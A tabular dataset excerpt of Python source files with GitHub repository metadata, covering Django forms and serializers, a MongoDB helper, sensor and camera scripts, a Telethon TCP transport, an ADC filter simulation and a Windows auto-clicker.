hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 | count_classes int64 0 1.6M | score_classes float64 0 1 | count_generators int64 0 651k | score_generators float64 0 1 | count_decorators int64 0 990k | score_decorators float64 0 1 | count_async_functions int64 0 235k | score_async_functions float64 0 1 | count_documentation int64 0 1.04M | score_documentation float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d590b2e41df4cf47a10f9711b5f682f57ac29747 | 62 | py | Python | lib/__init__.py | co9olguy/Generating-and-designing-DNA | 7dab87a1002790d37e929c5542f9761ae7d16416 | [
"Unlicense"
] | 32 | 2018-04-29T22:34:43.000Z | 2022-03-14T05:54:25.000Z | lib/__init__.py | co9olguy/Generating-and-designing-DNA | 7dab87a1002790d37e929c5542f9761ae7d16416 | [
"Unlicense"
] | 3 | 2019-04-02T07:05:34.000Z | 2022-02-18T17:34:03.000Z | lib/__init__.py | co9olguy/Generating-and-designing-DNA | 7dab87a1002790d37e929c5542f9761ae7d16416 | [
"Unlicense"
] | 11 | 2018-05-25T09:31:37.000Z | 2021-12-13T17:58:29.000Z | from .utils import *
from .models import *
from .dna import *
| 15.5 | 21 | 0.709677 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
d5911080649fbef3f58c84aa754a86cb5bf6ca4d | 2,098 | py | Python | src/app/forms.py | triump0870/i2a | bc4b9e7615d645b153a4df5a37d3e088a2ed47b7 | [
"MIT"
] | null | null | null | src/app/forms.py | triump0870/i2a | bc4b9e7615d645b153a4df5a37d3e088a2ed47b7 | [
"MIT"
] | null | null | null | src/app/forms.py | triump0870/i2a | bc4b9e7615d645b153a4df5a37d3e088a2ed47b7 | [
"MIT"
] | null | null | null | from django import forms
from app.models import Application, Owner, Questionnaire, Tag, Rule, TagType
from crispy_forms.bootstrap import Field
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Layout, Submit, ButtonHolder, Fieldset, Hidden, HTML
class ApplicationForm(forms.ModelForm):
class Meta:
model = Application
fields = ['name', 'description', 'primary_owner', 'secondary_owner', 'logo', 'review_cycle', 'next_review_date']
# def __init__(self, *args, **kwargs):
# super(ApplicationForm, self).__init__(*args, )
# self.helper = FormHelper()
# self.helper.form_tag = False
# self.helper.form_class = 'form-horizontal'
# self.helper.layout = Layout(
# Field('name'),
# Field('description'),
# Field('primary_owner'),
# Field('secondary_owner'),
# Field('logo'),
# Field('review_cycle'),
# Field('next_review_date', css_class='input-small dateinput'),
# Submit('submit', 'Submit', css_class="btn-success"),
# )
class OwnerForm(forms.ModelForm):
class Meta:
model = Owner
fields = ['name', 'email']
class QuestionnaireForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(QuestionnaireForm, self).__init__(*args, **kwargs)
self.helper = FormHelper(self)
self.helper.form_class = 'form-inline'
self.helper.field_template = 'bootstrap3/layout/inline_field.html'
self.helper.layout = Layout(
Field('application_name')
)
class Meta:
model = Questionnaire
fields = ['application_name']
class TagForm(forms.ModelForm):
class Meta:
model = Tag
fields = ['name', 'type', 'description']
class TagTypeForm(forms.ModelForm):
class Meta:
model = TagType
fields = ['name', 'description']
class RuleForm(forms.ModelForm):
class Meta:
model = Rule
fields = '__all__'
| 31.313433 | 120 | 0.604862 | 1,808 | 0.861773 | 0 | 0 | 0 | 0 | 0 | 0 | 798 | 0.380362 |
d591a35f1a2c7e8df082016293ac3874fbf0a395 | 495 | py | Python | rest_api/mongo_connect.py | pssudo/kubernetes-fastapi | 87592c90fd09e587196674592b2dbdc4bc7a64ce | [
"MIT"
] | 1 | 2021-03-21T04:18:58.000Z | 2021-03-21T04:18:58.000Z | rest_api/mongo_connect.py | pssudo/kubernetes-fastapi | 87592c90fd09e587196674592b2dbdc4bc7a64ce | [
"MIT"
] | null | null | null | rest_api/mongo_connect.py | pssudo/kubernetes-fastapi | 87592c90fd09e587196674592b2dbdc4bc7a64ce | [
"MIT"
] | null | null | null | import motor.motor_asyncio
import os
mongo_server = os.environ['DB_HOST']
mongo_port = os.environ['DB_PORT']
mongo_db = os.environ['DB_NAME']
mongo_user = os.environ['DB_USER']
mongo_passwd = os.environ['DB_PASSWD']
MONGO_DETAILS = "mongodb://" + mongo_user + ":" + mongo_passwd + "@" + mongo_server + ":" + mongo_port + "/?authSource=admin"
client = motor.motor_asyncio.AsyncIOMotorClient(MONGO_DETAILS)
database = client[mongo_db]
electronic_collection = database.get_collection("electronics") | 45 | 125 | 0.759596 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 101 | 0.20404 |
d5941de181d766fe9b1b45b29107028645c7d1ae | 512 | py | Python | cloudmesh/pi/water.py | cloudmesh/cloudmesh.pi | bdf706b3763031341c41b811749064c293e73c14 | [
"Apache-2.0"
] | 2 | 2017-09-18T00:56:36.000Z | 2018-06-01T23:41:23.000Z | cloudmesh/pi/water.py | cloudmesh/cloudmesh-pi | bdf706b3763031341c41b811749064c293e73c14 | [
"Apache-2.0"
] | 1 | 2018-04-16T18:37:17.000Z | 2018-04-16T18:37:17.000Z | cloudmesh/pi/water.py | cloudmesh/cloudmesh.pi | bdf706b3763031341c41b811749064c293e73c14 | [
"Apache-2.0"
] | 3 | 2017-09-20T11:13:54.000Z | 2017-11-30T23:48:37.000Z | import time
import grovepi
class WaterSensor(object):
def __init__(self, pin=2):
"""
connect sensor to digital port. D2 is default.
:param pin: Number
"""
self.pin = pin
grovepi.pinMode(self.pin, "INPUT")
def get(self):
"""
gets the value measured by water sensor.
:return: Integer
"""
return grovepi.digitalRead(self.pin)
if __name__ == "__main__":
ws = WaterSensor()
water = ws.get()
print(water)
| 19.692308 | 54 | 0.564453 | 393 | 0.767578 | 0 | 0 | 0 | 0 | 0 | 0 | 203 | 0.396484 |
d594390832d9d4fefb61b67618c808b718384226 | 928 | py | Python | telethon/network/connection/tcpabridged.py | s3mple/Telethon | 476bbdd6a1fb6f917adf9204e6cd825b008dd9c1 | [
"MIT"
] | 1 | 2018-10-07T08:31:49.000Z | 2018-10-07T08:31:49.000Z | telethon/network/connection/tcpabridged.py | s3mple/Telethon | 476bbdd6a1fb6f917adf9204e6cd825b008dd9c1 | [
"MIT"
] | null | null | null | telethon/network/connection/tcpabridged.py | s3mple/Telethon | 476bbdd6a1fb6f917adf9204e6cd825b008dd9c1 | [
"MIT"
] | 1 | 2018-09-05T14:59:27.000Z | 2018-09-05T14:59:27.000Z | import struct
from .tcpfull import ConnectionTcpFull
class ConnectionTcpAbridged(ConnectionTcpFull):
"""
This is the mode with the lowest overhead, as it will
only require 1 byte if the packet length is less than
508 bytes (127 << 2, which is very common).
"""
async def connect(self, ip, port):
result = await super().connect(ip, port)
await self.conn.write(b'\xef')
return result
async def recv(self):
length = struct.unpack('<B', await self.read(1))[0]
if length >= 127:
length = struct.unpack('<i', await self.read(3) + b'\0')[0]
return await self.read(length << 2)
async def send(self, message):
length = len(message) >> 2
if length < 127:
length = struct.pack('B', length)
else:
length = b'\x7f' + int.to_bytes(length, 3, 'little')
await self.write(length + message)
| 29 | 71 | 0.595905 | 871 | 0.938578 | 0 | 0 | 0 | 0 | 627 | 0.675647 | 213 | 0.229526 |
d5959b570e07360b0fe5902da6068315badc51ef | 1,274 | py | Python | app/core/tests/test_models.py | ahmedgamalmansy/recipe-app-api | 14443d9cd7d0fe2504361e8f86a9505c8faa9093 | [
"MIT"
] | null | null | null | app/core/tests/test_models.py | ahmedgamalmansy/recipe-app-api | 14443d9cd7d0fe2504361e8f86a9505c8faa9093 | [
"MIT"
] | null | null | null | app/core/tests/test_models.py | ahmedgamalmansy/recipe-app-api | 14443d9cd7d0fe2504361e8f86a9505c8faa9093 | [
"MIT"
] | null | null | null | from django.test import TestCase
from django.contrib.auth import get_user_model
class ModelTests(TestCase):
def test_create_user_with_email_successful(self):
""" test create new user with an email is successful"""
email = "ahmed.mansy@segmatek.com"
password= "Agmansy0100"
user = get_user_model().objects.create_user(
email = email,
password = password
)
self.assertEqual(user.email, email)
self.assertTrue(user.check_password(password))
def test_new_user_email_normalized(self):
""" test that email for new user is normalized"""
email = "ahmed.mansy@SEGMATEK.com"
password= "Agmansy0100"
user = get_user_model().objects.create_user(email, password)
self.assertEqual(user.email, email.lower())
self.assertTrue(user.check_password(password))
def test_new_user_invalid_email(self):
""" test creating new user with no email address"""
with self.assertRaises(ValueError):
get_user_model().objects.create_user(None, 'test123')
def test_create_new_superuser(self):
""" test that email for new user is normalized"""
email = "ahmed.mansy@SEGMATEK.com"
password= "Agmansy0100"
user = get_user_model().objects.create_superuser(email, password)
self.assertTrue(user.is_superuser)
self.assertTrue(user.is_staff) | 31.073171 | 68 | 0.752747 | 1,193 | 0.936421 | 0 | 0 | 0 | 0 | 0 | 0 | 330 | 0.259027 |
d5964f0e3f92c5ca6a4083ce024d1eef5ffe0c51 | 350 | py | Python | elements/light.py | partha-ghosh/pyeffects | b941e9b09c9889c01b103d758707d36c3520de2a | [
"MIT"
] | null | null | null | elements/light.py | partha-ghosh/pyeffects | b941e9b09c9889c01b103d758707d36c3520de2a | [
"MIT"
] | null | null | null | elements/light.py | partha-ghosh/pyeffects | b941e9b09c9889c01b103d758707d36c3520de2a | [
"MIT"
] | null | null | null | import numpy as np
class Light:
_position = np.array([960, 540, 300.0, 1])
_color = np.array([255, 255, 255])
def set_position(position):
Light._position = position
def set_color(color):
Light._color = color
def get_color():
return Light._color
def get_position():
return Light._position
| 18.421053 | 46 | 0.617143 | 328 | 0.937143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
d5965fa61cb67bd67adba3b00ebd73edc4c2a0a6 | 727 | py | Python | pyAI-OpenMV4/2.机器视觉/7.图片拍摄/1.普通拍摄/snapshot.py | 01studio-lab/MicroPython_Examples | f06a1bee398674ceafebed2aac88d8413cc8abad | [
"MIT"
] | 73 | 2020-05-02T13:48:27.000Z | 2022-03-26T13:15:10.000Z | pyAI-OpenMV4/2.机器视觉/7.图片拍摄/1.普通拍摄/snapshot.py | 01studio-lab/MicroPython_Examples | f06a1bee398674ceafebed2aac88d8413cc8abad | [
"MIT"
] | null | null | null | pyAI-OpenMV4/2.机器视觉/7.图片拍摄/1.普通拍摄/snapshot.py | 01studio-lab/MicroPython_Examples | f06a1bee398674ceafebed2aac88d8413cc8abad | [
"MIT"
] | 50 | 2020-05-15T13:57:28.000Z | 2022-03-30T14:03:33.000Z | # 普通拍照例程
#
# 提示: 你需要插入SD卡来运行这个例程.
#
# 你可以使用你的OpenMV设备保存图片。
#导入相关模块,pyb用于LED控制。
import sensor, image, pyb
RED_LED_PIN = 1
BLUE_LED_PIN = 3
#摄像头相关初始化
sensor.reset() # Initialize the camera sensor.
sensor.set_pixformat(sensor.RGB565) # or sensor.GRAYSCALE
sensor.set_framesize(sensor.QVGA) # or sensor.QQVGA (or others)
sensor.skip_frames(time = 2000) # Let new settings take affect.
#红灯亮提示拍照开始
pyb.LED(RED_LED_PIN).on()
sensor.skip_frames(time = 2000) # 给2秒时间用户准备.
pyb.LED(RED_LED_PIN).off()
#蓝灯亮提示正在拍照
pyb.LED(BLUE_LED_PIN).on()
print("You're on camera!")
sensor.snapshot().save("example.jpg") # 拍摄并保存相关文件,也可以用"example.bmp"或其它。
pyb.LED(BLUE_LED_PIN).off() #提示拍照完成
print("Done! Reset the camera to see the saved image.")
| 22.030303 | 71 | 0.749656 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 556 | 0.593383 |
d596976be192ececaf598f9c26104ca0d3976fc5 | 344 | py | Python | website/addons/osfstorage/settings/defaults.py | DanielSBrown/osf.io | 98dda2ac237377197acacce78274bc0a4ce8f303 | [
"Apache-2.0"
] | null | null | null | website/addons/osfstorage/settings/defaults.py | DanielSBrown/osf.io | 98dda2ac237377197acacce78274bc0a4ce8f303 | [
"Apache-2.0"
] | 13 | 2020-03-24T15:29:41.000Z | 2022-03-11T23:15:28.000Z | website/addons/osfstorage/settings/defaults.py | DanielSBrown/osf.io | 98dda2ac237377197acacce78274bc0a4ce8f303 | [
"Apache-2.0"
] | null | null | null | # encoding: utf-8
import os
from website import settings
WATERBUTLER_CREDENTIALS = {
'storage': {}
}
WATERBUTLER_SETTINGS = {
'storage': {
'provider': 'filesystem',
'folder': os.path.join(settings.BASE_PATH, 'osfstoragecache'),
}
}
WATERBUTLER_RESOURCE = 'folder'
DISK_SAVING_MODE = settings.DISK_SAVING_MODE
| 15.636364 | 70 | 0.680233 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 90 | 0.261628 |
d5979c547106abfe2c4a788fa3eb19744770566f | 371 | py | Python | 3_dot_product.py | codeclassifiers/nnfs | 8583c1ccf3d155779057cb5041d52a3002282b04 | [
"MIT"
] | 1 | 2021-09-18T05:00:05.000Z | 2021-09-18T05:00:05.000Z | 3_dot_product.py | codeclassifiers/nnfs | 8583c1ccf3d155779057cb5041d52a3002282b04 | [
"MIT"
] | null | null | null | 3_dot_product.py | codeclassifiers/nnfs | 8583c1ccf3d155779057cb5041d52a3002282b04 | [
"MIT"
] | 1 | 2021-09-18T05:00:06.000Z | 2021-09-18T05:00:06.000Z | #Example of dot product using numpy
import numpy as np
#Sample input to perceptron
inputs = [1.2, 2.2, 3.3, 2.5]
#Weights passed to perceptron
weights = [0.4,0.6,-0.7, 1.1]
#bias for a particular perceptron
bias = 2
#Take dot product between weights and input
#and add bias to the summation value
output = np.dot(inputs, weights) + bias
print(output)
#Output:-
4.24 | 19.526316 | 44 | 0.719677 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 213 | 0.574124 |
d5993de97589837ac20b5cb949eaf132912bde00 | 4,725 | py | Python | m2k/python/precision_adc_tutorial/ad7124_filters.py | mthoren-adi/education_tools | e99d47d0d6b56e05c8ed6692d57fa8518d610630 | [
"CC-BY-4.0"
] | 17 | 2018-11-11T03:08:57.000Z | 2022-02-15T22:37:59.000Z | m2k/python/precision_adc_tutorial/ad7124_filters.py | chensi007/education_tools | 3b4280308eb34bcafbd50035ea780a269883f2f7 | [
"CC-BY-4.0"
] | 6 | 2019-07-31T13:05:36.000Z | 2021-07-06T06:51:11.000Z | m2k/python/precision_adc_tutorial/ad7124_filters.py | chensi007/education_tools | 3b4280308eb34bcafbd50035ea780a269883f2f7 | [
"CC-BY-4.0"
] | 18 | 2018-10-29T20:11:36.000Z | 2022-01-24T00:42:10.000Z | # -*- coding: utf-8 -*-
# ---------------------------------------------------------------------------
# Copyright (c) 2015-2019 Analog Devices, Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# - Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# - Modified versions of the software must be conspicuously marked as such.
# - This software is licensed solely and exclusively for use with
# processors/products manufactured by or for Analog Devices, Inc.
# - This software may not be combined or merged with other code in any manner
# that would cause the software to become subject to terms and conditions
# which differ from those listed here.
# - Neither the name of Analog Devices, Inc. nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
# - The use of this software may or may not infringe the patent rights of one
# or more patent holders. This license does not release you from the
# requirement that you obtain separate licenses from these patent holders
# to use this software.
#
# THIS SOFTWARE IS PROVIDED BY ANALOG DEVICES, INC. AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# NON-INFRINGEMENT, TITLE, MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL ANALOG DEVICES, INC. OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, PUNITIVE OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# DAMAGES ARISING OUT OF CLAIMS OF INTELLECTUAL PROPERTY RIGHTS INFRINGEMENT;
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# 2019-01-10-7CBSD SLA
# -----------------------------------------------------------------------
'''
Simulation of some of the AD7124's filters.
This program QUALITATIVELY derives a filter of a type similar to that
used in the AD7124 family of ADCs, that is, it is not bit-accurate, refer
to the datasheet for guaranteed specifications.
Tested with Python 3.7, Anaconda distribution
'''
from numpy import min, max, convolve, random, average, ones, zeros, amax, log
import numpy as np
from scipy import linspace, fft
from scipy import signal
from scipy.signal import lti, step
from matplotlib import pyplot as plt
plot_sinc4 = True
# Base sample rate in high-power mode, From AD7124 datasheet
f0 = 19200
# Calculate SINC1 oversample ratios for 50, 60Hz
osr50 = int(f0/50)
osr60 = int(f0/60)
# Create "boxcar" SINC1 filters
sinc1_50 = np.ones(osr50)
sinc1_60 = np.ones(osr60)
# Calculate higher order filters
sinc2_50 = np.convolve(sinc1_50, sinc1_50)
sinc3_50 = np.convolve(sinc2_50, sinc1_50)
sinc4_50 = np.convolve(sinc2_50, sinc2_50)
# Here's the filter from datasheet Figure 91,
# SINC4-ish filter with one three zeros at 50Hz, one at 60Hz.
filt_50_60_rej = np.convolve(sinc3_50, sinc1_60)
# Normalize to unity gain by dividing by sum of all taps
sinc1_50 /= np.sum(sinc1_50)
sinc1_60 /= np.sum(sinc1_60)
sinc2_50 /= np.sum(sinc2_50)
sinc3_50 /= np.sum(sinc3_50)
sinc4_50 /= np.sum(sinc4_50)
filt_50_60_rej /= np.sum(filt_50_60_rej)
# freqz: Compute the frequency response of a digital filter.
# Older versions of SicPy return w as radians / sample, newer take an optional
# sample rate argument (fs). Computing frequencies (freqs)
# manually for backwards compatibility.
w, h = signal.freqz(filt_50_60_rej, 1, worN=16385, whole=False) #, fs=f0)
freqs = w * f0/(2.0*np.pi)
hmax = abs(max(h)) #Normalize to unity
response_dB = 20.0 * np.log10(abs(h)/hmax)
plt.figure(1)
plt.title('50Hz SINC1,2,4, and 50/60Hz SINC4 impulse responses')
plt.ylabel('tap val.')
plt.plot(sinc1_50)
plt.plot(sinc2_50)
plt.plot(sinc4_50)
plt.plot(filt_50_60_rej)
plt.xlabel('tap number')
plt.xlim(left=-100, right= 1.1* len(filt_50_60_rej))
plt.grid()
plt.figure(2)
plt.plot(freqs, response_dB, zorder=1)
plt.title('50/60Hz reject filter response')
plt.xlabel('Frequency')
plt.ylabel('Rejection')
plt.axis([0, 150, -120, 1])
plt.show()
| 39.049587 | 78 | 0.738836 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,464 | 0.733122 |
d599b8f92a8d48d05fa9f2f452a677696ae82fe2 | 962 | py | Python | products/forms.py | NewtonHead/e-commerce_project | 5ed448b033cd3771fc63f62022fe84ac8e17442d | [
"MIT"
] | null | null | null | products/forms.py | NewtonHead/e-commerce_project | 5ed448b033cd3771fc63f62022fe84ac8e17442d | [
"MIT"
] | null | null | null | products/forms.py | NewtonHead/e-commerce_project | 5ed448b033cd3771fc63f62022fe84ac8e17442d | [
"MIT"
] | null | null | null | from django import forms
from .models import Product, Category
from mptt.forms import TreeNodeChoiceField
from django.forms.fields import ImageField
class ProductForm(forms.Form):
title = forms.CharField(
label='',
widget=forms.TextInput(
attrs={
'placeholder': 'Your title'
}
)
)
image = forms.ImageField()
description = forms.CharField(
required=False,
widget=forms.Textarea(
attrs={
#'class': aca va una clase en el caso que la quieras usar
#'id': y aca la id
'rows': 5,
'cols': 20,
'placeholder': 'Describe your product :)'
}
)
)
category = TreeNodeChoiceField(queryset=Category.objects.all())
price = forms.DecimalField(initial=69.99)
featured = forms.BooleanField() | 31.032258 | 77 | 0.527027 | 812 | 0.844075 | 0 | 0 | 0 | 0 | 0 | 0 | 153 | 0.159044 |
d59b2e857c3657e22162648df0dce76d10dbed3f | 376 | py | Python | adminweb/migrations/0002_alter_profissional_cep.py | FinotelliCarlos/ewipesimple-adminweb-python | 3bf779250efeb9f85b4283ffbf210bf227aa8e8c | [
"MIT"
] | 1 | 2021-06-17T06:13:33.000Z | 2021-06-17T06:13:33.000Z | adminweb/migrations/0002_alter_profissional_cep.py | FinotelliCarlos/ewipesimple-adminweb-python | 3bf779250efeb9f85b4283ffbf210bf227aa8e8c | [
"MIT"
] | null | null | null | adminweb/migrations/0002_alter_profissional_cep.py | FinotelliCarlos/ewipesimple-adminweb-python | 3bf779250efeb9f85b4283ffbf210bf227aa8e8c | [
"MIT"
] | null | null | null | # Generated by Django 3.2 on 2021-06-16 16:53
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('adminweb', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='profissional',
name='cep',
field=models.CharField(max_length=8),
),
]
| 19.789474 | 49 | 0.590426 | 285 | 0.757979 | 0 | 0 | 0 | 0 | 0 | 0 | 88 | 0.234043 |
d59b7e7d7e960aceb68d09f0d6e1dfd11582bf66 | 7,064 | py | Python | ios/serializers.py | NadavK/djhome | 4f0d936dc475c91e0590bd22deae818cf2650840 | [
"MIT"
] | null | null | null | ios/serializers.py | NadavK/djhome | 4f0d936dc475c91e0590bd22deae818cf2650840 | [
"MIT"
] | 8 | 2020-02-11T23:59:46.000Z | 2022-03-03T21:49:33.000Z | ios/serializers.py | NadavK/djhome | 4f0d936dc475c91e0590bd22deae818cf2650840 | [
"MIT"
] | null | null | null | from .models import Input, Output, InputToOutput, Device
from rest_framework import serializers
from taggit_serializer.serializers import (TagListSerializerField, TaggitSerializer)
from taggit.models import Tag
class DeviceSerializer(serializers.ModelSerializer):
class Meta:
model = Device
fields = ('id', 'description')
class InputSerializer(TaggitSerializer, serializers.HyperlinkedModelSerializer):
#url = serializers.HyperlinkedIdentityField(view_name="input:id")
pk = serializers.ReadOnlyField()
tags = TagListSerializerField()
type = serializers.SerializerMethodField()
device = DeviceSerializer(many=False)
#device = serializers.PrimaryKeyRelatedField(queryset=Device.objects.all(), allow_null=True)
#highlight = serializers.HyperlinkedIdentityField(view_name='set_down', format='html')
class Meta:
model = Input
#fields = ('url', 'ph_sn', 'index', 'input_type', 'deleted', 'description', 'outputs')
#fields = ('url', 'url2', 'ph_sn', 'index', 'input_type', 'deleted', 'description', 'outputs', 'tags',)
fields = '__all__'
def get_type(self, obj):
try:
return Input.INPUT_TYPES[obj.input_type-1][1]
except Exception as ex:
return 'UNKNOWN'
# def get_device(self, obj):
# try:
# return obj.device.pk
# except Exception as ex:
# return 'NONE'
def set_device(self, obj, value):
try:
obj.device.pk = value
except Exception as ex:
return 'NONE'
class InputSimpleSerializer(TaggitSerializer, serializers.ModelSerializer):
tags = TagListSerializerField()
type = serializers.SerializerMethodField()
class Meta:
model = Input
fields = 'pk', 'description', 'type', 'tags', 'state'
def get_type(self, obj):
try:
return Input.INPUT_TYPES[obj.input_type-1][1]
except Exception as ex:
return 'UNKNOWN'
class InputAdminSerializer(InputSimpleSerializer):
class Meta(InputSimpleSerializer.Meta):
model = Input
fields = 'pk', 'description', 'type', 'tags', 'state', 'device', 'index'
#
# class OutputSerializer_base(TaggitSerializer, serializers.HyperlinkedModelSerializer):
# def get_type(self, obj):
# try:
# import logging
# logger = logging.getLogger('ios.views.IOsView')
# logger.debug('??????????????????????????????????????????????????')
#
# return Output.OUTPUT_TYPES[obj.output_type-1][1]
# except Exception as ex:
# return 'UNKNOWN'
#
# def get_permissions(self, obj):
# try:
# return obj.permissions
# except Exception as ex:
# return 'UNKNOWN'
#
#
# class OutputSerializer(OutputSerializer_base):
# #url = serializers.HyperlinkedIdentityField(view_name="input:id")
# pk = serializers.ReadOnlyField()
# type = serializers.SerializerMethodField()
# tags = TagListSerializerField()
# permissions = serializers.SerializerMethodField()
#
# class Meta:
# model = Output
# fields = '__all__'
# extra_fields = ['permissions']
# #fields = ('pk', 'url', 'ph_sn', 'index', 'output_type', 'deleted', 'description', 'total_progress', '_my_state',)
#
# def get_field_names(self, declared_fields, info):
# """
# Adds the 'extra_fields' to '_all_'
# https://stackoverflow.com/questions/38245414/django-rest-framework-how-to-include-all-fields-and-a-related-field-in-mo
# :param declared_fields:
# :param info:
# :return:
# """
# import logging
# logger = logging.getLogger('ios.views.IOsView')
# logger.debug('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%')
# expanded_fields = super(OutputSerializer, self).get_field_names(declared_fields, info)
# logger.debug('*************************************')
# logger.debug(expanded_fields)
#
# if getattr(self.Meta, 'extra_fields', None):
# logger.debug('++++++++++++++++++++++++++++++++++++++')
# logger.debug(expanded_fields)
# return expanded_fields + self.Meta.extra_fields
# else:
# logger.debug('--------------------------------------')
# logger.debug(expanded_fields)
# return expanded_fields
#
#
#
# class OutputSimpleSerializer(OutputSerializer_base):
# type = serializers.SerializerMethodField()
# tags = TagListSerializerField()
# permissions = serializers.SerializerMethodField()
#
# class Meta:
# model = Output
# fields = 'pk', 'description', 'state', 'type', 'tags', 'execution_limit', 'started_time', 'current_position', 'permissions'
#
#
# class OutputAdminSerializer(OutputSimpleSerializer):
# class Meta(OutputSimpleSerializer.Meta):
# model = Output
# fields = 'pk', 'description', 'state', 'type', 'tags', 'execution_limit', 'started_time', 'current_position', 'ph_sn', 'index'
#
class OutputSerializer(TaggitSerializer, serializers.HyperlinkedModelSerializer):
#url = serializers.HyperlinkedIdentityField(view_name="input:id")
pk = serializers.ReadOnlyField()
type = serializers.SerializerMethodField()
tags = TagListSerializerField()
permissions = serializers.SerializerMethodField()
device = DeviceSerializer(many=False)
class Meta:
model = Output
fields = '__all__'
#fields = ('pk', 'url', 'ph_sn', 'index', 'output_type', 'deleted', 'description', 'total_progress', '_my_state',)
def get_type(self, obj):
try:
return Output.OUTPUT_TYPES[obj.output_type-1][1]
except Exception as ex:
return 'UNKNOWN'
def get_permissions(self, obj):
try:
return obj.permissions
except Exception as ex:
return 'UNKNOWN'
class OutputSimpleSerializer(OutputSerializer):
#type = serializers.SerializerMethodField()
#tags = TagListSerializerField()
class Meta(OutputSerializer.Meta):
#model = Output
fields = 'pk', 'description', 'state', 'type', 'tags', 'execution_limit', 'started_time', 'current_position', 'permissions', 'supports_schedules'
#def get_type(self, obj):
# try:
# return Output.OUTPUT_TYPES[obj.output_type-1][1]
# except Exception as ex:
# return 'UNKNOWN'
class OutputAdminSerializer(OutputSimpleSerializer):
class Meta(OutputSimpleSerializer.Meta):
#model = Output
fields = 'pk', 'description', 'state', 'type', 'tags', 'execution_limit', 'started_time', 'current_position', 'permissions', 'supports_schedules', 'device', 'index'
#class IOsSerializer(serializers.Serializer):
# inputs = InputSerializer(many=True, read_only=True)
# outputs = OutputSerializer(many=True, read_only=True)
class TagSerializer(serializers.ModelSerializer):
class Meta:
model = Tag
fields = '__all__'
| 32.552995 | 172 | 0.625283 | 3,770 | 0.533692 | 0 | 0 | 0 | 0 | 0 | 0 | 4,368 | 0.618347 |
d59ce46ab897a4326a316a12b1908c1b167c893a | 894 | py | Python | bin/clicker.py | Martincic/click-automatizer | 1b4f4303b7d40bcaac470238ab21837f2fbad92a | [
"MIT"
] | 1 | 2022-02-05T11:05:58.000Z | 2022-02-05T11:05:58.000Z | bin/clicker.py | Martincic/click-automatizer | 1b4f4303b7d40bcaac470238ab21837f2fbad92a | [
"MIT"
] | null | null | null | bin/clicker.py | Martincic/click-automatizer | 1b4f4303b7d40bcaac470238ab21837f2fbad92a | [
"MIT"
] | null | null | null | from threading import Thread
from time import sleep
import win32api, win32con
import pyautogui
import keyboard
import os
def clickPositions(all_positions, repeat, timeout):
#Activate safety killswitch
thread = Thread(target = safetyKillswitch)
thread.start()
should_repeat = True
iteration = 0
while should_repeat:
for position in all_positions:
sleep(float(timeout))
click(position.x, position.y)
iteration += 1
if iteration == int(repeat):
should_repeat = False
def click(x,y):
win32api.SetCursorPos((x,y))
win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN,x,y,0,0)
win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP,x,y,0,0)
def safetyKillswitch():
while True:
keyboard.wait("esc")
print("ESC key pressed! Emergency exit activated... ")
os._exit(1)
